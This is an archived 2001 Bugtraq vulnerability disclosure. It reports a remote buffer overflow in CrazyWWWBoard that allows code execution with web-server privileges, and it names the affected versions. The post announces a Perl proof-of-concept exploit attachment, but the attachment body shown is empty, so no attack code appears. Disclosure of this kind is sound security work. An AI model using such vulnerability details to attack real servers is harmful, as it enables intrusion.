[19969] in bugtraq


Remote buffer overflow in CrazyWWWBoard.

daemon@ATHENA.MIT.EDU (teleh0r)
Sat Mar 31 20:26:23 2001

Content-Type: Multipart/Mixed; charset="iso-8859-1";
              boundary="------------Boundary-00=_A2I2DLCMTNFX032YRX2X"
MIME-Version: 1.0
Message-ID:  <01033115083400.01691@localhost.localdomain>
Date:         Sat, 31 Mar 2001 15:08:34 +0000
Reply-To: teleh0r <teleh0r@DOGLOVER.COM>
From: teleh0r <teleh0r@DOGLOVER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

--------------Boundary-00=_A2I2DLCMTNFX032YRX2X
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Dear Bugtraq,

"Just little bits of history repeating"

I have discovered a buffer overflow in CrazyWWWBoard Full Edition &&
CrazyWWWBoard Limited Edition.

This is NOT the same overflow as discovered by Jin Ho You, 01.30.2001
(http://www.securityfocus.com/archive/1/159387)

This overflow will allow for arbitrary code execution with the privileges of
the web server. The versions which have been tested are:
CrazyWWWBoard2000p4 for RedHat 6.0 and CrazyWWWBoard2000LEp5 for
RedHat 6.1.

Proof of Concept exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard
--------------Boundary-00=_A2I2DLCMTNFX032YRX2X
Content-Type: application/x-perl;
  charset="iso-8859-1";
  name="crazywwwb-exploit.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="crazywwwb-exploit.pl"


--------------Boundary-00=_A2I2DLCMTNFX032YRX2X--
